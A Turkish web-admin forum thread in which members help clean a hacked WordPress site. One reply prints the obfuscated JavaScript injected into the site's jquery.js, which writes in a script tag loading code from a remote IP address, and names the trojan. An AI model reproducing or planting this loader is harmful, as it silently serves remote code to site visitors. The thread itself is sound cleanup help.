http://www.turktarihi.com/ web sitesinde saldırıya uğramış içerik tespit edildi
Güvenliği ihlal edilmiş olduğunu belirlediğimiz sayfalara ait bir veya daha fazla URL örneği aşağıda belirtilmiştir. Bu saldırıya uğramış içeriğin göründüğü yerleri daha iyi anlamak için bu örnekleri inceleyin. Bu liste tam kapsamlı değildir.
http://www.turktarihi.com/d57j/5l92a...ils-5-tutorial
Merhaba arkadaşlar. Yukarıda belirttiğim problemin sebebi ve çözümü konusunda yardımcı olabilecek kimse var mıdır
...tarihi.com/ web sitesinde saldırıya uğramış içerik tespit edildi
6
●484
- 25-02-2018, 20:12:52Geçen bir yerde denk geldim sunucuda ki tüm sitelere atmışlar.
FTP ana dizinde dosya ve klasör şeklinde bi kaç dosya var onları sil htaccess eklemeler var onlarıda düzenle tamamdır.
Ama açığı bulmak lazım.Sunucuda diğer siteleride kontrol et yoksa sitende açık olabilir. - 25-02-2018, 23:42:11Bahsettiğin gibi yabancı dosyaları sildim fakat .htaccess'de farklı kod göremedim. .htaccess dosyasını aynen kopyalayıp aşağıda paylaşıyorum ;CoLLeR adlı üyeden alıntı: mesajı görüntüle
# BEGIN WordPress <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> # END WordPress - 25-02-2018, 23:47:33Merhaba,
http://www.turktarihi.com/wp-include...uery/jquery.js şu dosyasını kontrol eder misin? - 25-02-2018, 23:52:53Üyeliği durdurulduvar _0xc790=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x6 5","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x6 3\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\ x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x3 2\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\ x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C"," \x77\x72\x69\x74\x65"];document[_0xc790[5]](_0xc790[4][_0xc790[3]](_0xc790[0])[_0xc790[2]]()[_0xc790[1]](_0xc790[0])) kodlar burda.. bilginize bey efendi.AvrupaGelinlik adlı üyeden alıntı: mesajı görüntüle
wp-includes/js/jquery/jquery.js?ver=1.12.4
buyrun wp content hariç config hariç silip geri yükleyin.
SHA1 kodu : 5ac64870345a61f61ddeeff82cb2dca0e6487abe
Trojen ismi : TrojWare.JS.Redirector.NKK - 26-02-2018, 00:24:17Kontrol ettim fakat bunu nasıl temizleyebilirimMira.Net.TR adlı üyeden alıntı: mesajı görüntüle
- 26-02-2018, 00:29:24Lordbey adlı üyeden alıntı: mesajı görüntüleLordumun dediği gibi yapabilirsin en sağlıklısı olacaktır. Yine aynı durum olur ise sunucu sahibiyle bir görüşün kontrol etsin sağı soluAvrupaGelinlik adlı üyeden alıntı: mesajı görüntüle